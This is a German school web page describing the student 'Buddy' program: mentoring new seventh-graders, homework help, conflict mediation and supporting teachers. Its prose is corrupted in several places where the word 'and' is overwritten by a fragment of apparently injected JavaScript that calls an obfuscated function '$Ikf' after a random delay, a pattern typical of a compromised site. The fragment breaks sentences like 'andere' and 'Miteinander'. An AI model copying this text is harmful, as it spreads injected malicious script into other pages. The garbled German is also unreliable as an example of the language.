buddy_logont

Buddy heißt übersetzt Kumpel oder guter Freund, also jemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, der sich für andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere einsetzt, Verantwortung für sich und andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere übernimmt und Konflikte konstruktiv löst.

Im Rahmen der Schule bedeutet das u.a.:
  • unseren „Neulingen“ Orientierungshilfe geben (Teamer für 7-Klässler)
  • Hilfe beim Lernen geben (Lernpate, z.B. auch als Hausaufgabenhilfe)
  • Hilfe in schwierigen schulischen oder auch privaten Situationen geben (z.B. beim Lösen von Konflikten-Streitschlichter)
  • Zusammenarbeit mit den Klassenlehrern, Sozialpädagogen und Erziehern
  • Ordnungsschüler (z.B. Unterstützung der Lehrer bei Pausenaufsichten und bei der Absicherung von schulischen Veranstaltungen)
Die wichtigsten Voraussetzungen, um ein Buddy zu werden, sind ein hohes Maß an Verantwortungsbewusstsein und der Wunsch, sich für andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere im Sinne eines sozialen Miteinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders einzusetzen.
Wenn du ein Buddy werden möchtest, dann komm in unsere Arbeitsgemeinschaft. Hier wirst du angeleitet, trainiert und als Buddy ausgebildet.